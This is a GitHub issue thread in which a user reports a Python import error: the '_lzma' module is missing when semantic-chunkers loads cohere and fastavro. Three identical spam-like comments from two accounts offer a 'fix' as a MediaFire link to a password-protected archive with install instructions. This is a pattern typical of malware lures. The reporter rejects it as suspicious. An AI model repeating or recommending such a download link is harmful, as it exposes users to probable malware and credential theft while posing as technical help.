### ISSUE TITLE
Issue installing from pip

### ISSUE THREAD

**Issue by DataBassGit** [aurelio-labs/semantic-chunkers#19]
I get the following error:

/usr/local/lib/python3.11/site-packages/pydantic/_internal/_config.py:341: UserWarning: Valid config keys have changed in V2:
* 'allow_population_by_field_name' has been renamed to 'populate_by_name'
* 'smart_union' has been removed
  warnings.warn(message, UserWarning)
Traceback (most recent call last):
  File "/usr/local/lib/python3.11/site-packages/fastavro/read.py", line 2, in <module>
    from . import _read
  File "fastavro/_read.pyx", line 10, in init fastavro._read
  File "/usr/local/lib/python3.11/lzma.py", line 27, in <module>
    from _lzma import *
ModuleNotFoundError: No module named '_lzma'

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/data/PycharmProjects/Dignity/main.py", line 10, in <module>
    from Utilities.Memory import Memory
  File "/home/data/PycharmProjects/Dignity/Utilities/Memory.py", line 4, in <module>
    from Utilities.Journal import Journal
  File "/home/data/PycharmProjects/Dignity/Utilities/Journal.py", line 7, in <module>
    import agentforge.tools.SemanticChunk as Chunker
  File "/home/data/PycharmProjects/AgentForge/src/agentforge/tools/SemanticChunk.py", line 1, in <module>
    from semantic_chunkers import StatisticalChunker
  File "/usr/local/lib/python3.11/site-packages/semantic_chunkers/__init__.py", line 1, in <module>
    from semantic_chunkers.chunkers import (
  File "/usr/local/lib/python3.11/site-packages/semantic_chunkers/chunkers/__init__.py", line 1, in <module>
    from semantic_chunkers.chunkers.base import BaseChunker
  File "/usr/local/lib/python3.11/site-packages/semantic_chunkers/chunkers/base.py", line 5, in <module>
    from semantic_router.encoders.base import BaseEncoder
  File "/usr/local/lib/python3.11/site-packages/semantic_router/__init__.py", line 1, in <module>
    from semantic_router.hybrid_layer import HybridRouteLayer
  File "/usr/local/lib/python3.11/site-packages/semantic_router/hybrid_layer.py", line 6, in <module>
    from semantic_router.encoders import (
  File "/usr/local/lib/python3.11/site-packages/semantic_router/encoders/__init__.py", line 7, in <module>
    from semantic_router.encoders.cohere import CohereEncoder
  File "/usr/local/lib/python3.11/site-packages/semantic_router/encoders/cohere.py", line 4, in <module>
    import cohere
  File "/usr/local/lib/python3.11/site-packages/cohere/__init__.py", line 155, in <module>
    from .aws_client import AwsClient
  File "/usr/local/lib/python3.11/site-packages/cohere/aws_client.py", line 16, in <module>
    from .client import Client, ClientEnvironment
  File "/usr/local/lib/python3.11/site-packages/cohere/client.py", line 21, in <module>
    from .utils import wait, async_wait, merge_embed_responses, SyncSdkUtils, AsyncSdkUtils
  File "/usr/local/lib/python3.11/site-packages/cohere/utils.py", line 9, in <module>
    from fastavro import parse_schema, reader, writer
  File "/usr/local/lib/python3.11/site-packages/fastavro/__init__.py", line 47, in <module>
    import fastavro.read
  File "/usr/local/lib/python3.11/site-packages/fastavro/read.py", line 4, in <module>
    from . import _read_py as _read  # type: ignore
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/site-packages/fastavro/_read_py.py", line 9, in <module>
    import lzma
  File "/usr/local/lib/python3.11/lzma.py", line 27, in <module>
    from _lzma import *
ModuleNotFoundError: No module named '_lzma'

Seems like maybe something changed on cohere?

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by DataBassGit** [comment]
Lol. Put it on github. I'm not downloading an encrypted zip. You sus af

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
